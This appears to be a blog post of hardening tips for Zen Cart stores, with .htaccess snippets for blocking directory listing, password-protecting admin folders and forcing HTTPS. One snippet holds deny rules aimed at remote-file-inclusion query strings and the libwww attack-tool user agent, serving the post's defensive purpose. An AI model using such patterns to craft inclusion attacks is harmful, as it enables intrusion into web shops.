First and foremost make sure your Zen Cart is fully patched! No exceptions. Your Zen Cart you just downloaded and installed still needs these.

Now, do these items on Zen Cart’s recommended security list. On this list please ignore the following. If you choose to do these things, your robots.txt cannot be accessed and the php command will not work properly for you in most server environments.

#.htaccess to prevent unauthorized directory browsing or access to .php
files
IndexIgnore */*
<Files *.php>
Order Deny,Allow
Deny from all
</Files>
#add the following to protect against people discovering what version your
spiders.txt file is
<Files *.txt>
Order Deny,Allow
Deny from all
</Files>

Now, lets add some cool stuff to help you stay safe.

Tip #1: Use strong passwords for everything! Change them every 30 days.

Tip #2: When renaming your admin DO NOT use any admin or business related
term. Try banana for example, something like manage, control or anything XXadmin is a dead guess for most hackers to discover your admin directory.

Tip #3: Make sure all admins have their OWN accounts and install this module to track their access more conveniently.

Tip #4: Protect your admin directory with an additional auth when possible. Perhaps you can password protect the directory or allow access by IP address for example.

# password-protect the directory
AuthType basic
AuthName "This directory is protected"
AuthUserFile /home/path/.htpasswd
AuthGroupFile /dev/null
Require valid-user

# deny all except
<Limit GET POST PUT>
order deny,allow
deny from all
allow from 192.168.1.1
allow from .*domain\.com.*
</Limit>

Tip #5: Protect ALL directories from browsing with an index.html file. This file can be blank, it just prevents the directory from displaying in an index to browse. If a folder has an index.anything… It’s protected.

Tip #6: Protect your images directories (all) with the following .htaccess to prevent browsing, executing php files and more. These directories will also need an index file. When done, login to your hosting control panel and change the permissions on both the index.html and .htaccess files to 444 to prevent modification.

#PRO-Webs ver 1.8 1/2010
#Prevent directory viewing and the ability of any scripts to run.
#While a bit overkill this file prevents a wide array of access and executions
#of known exploits in your Zen Cart
#This file and a index.html should have the chmod 444
#This low setting allowance differs from server to server and should be set as
#low as possible and no higher that 644
#Permissions this low will likely need set in filemanager
#Place this in all images directories except BMZ_Cache
Options -ExecCGI -Indexes
IndexIgnore *
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)=http [NC]
RewriteRule ^(.*)$ - [F,L]
<Files .htaccess>
order allow,deny
deny from all
</Files>
<Files ~ "\.php$">
Order allow,deny
Deny from all
</Files>
chmod .htaccess files 444

Tip #7: If you have an SSL force all of your admin pages to load in only secured urls with the following htaccess code.

RewriteEngine On
RewriteCond %{SERVER_PORT} 80
RewriteCond %{REQUEST_URI} /admin_dir/
RewriteRule ^(.*)$ https://domain.com/admin_dir/$1 [R,L]

Tip #8: Make sure your cache folder has the correct index.php and .htaccess. Download a fresh version of Zen Cart and upload them to be sure. Now CHMOD, change the permissions of these to 444.

I may be adding to this, as we are always testing… so stay tuned.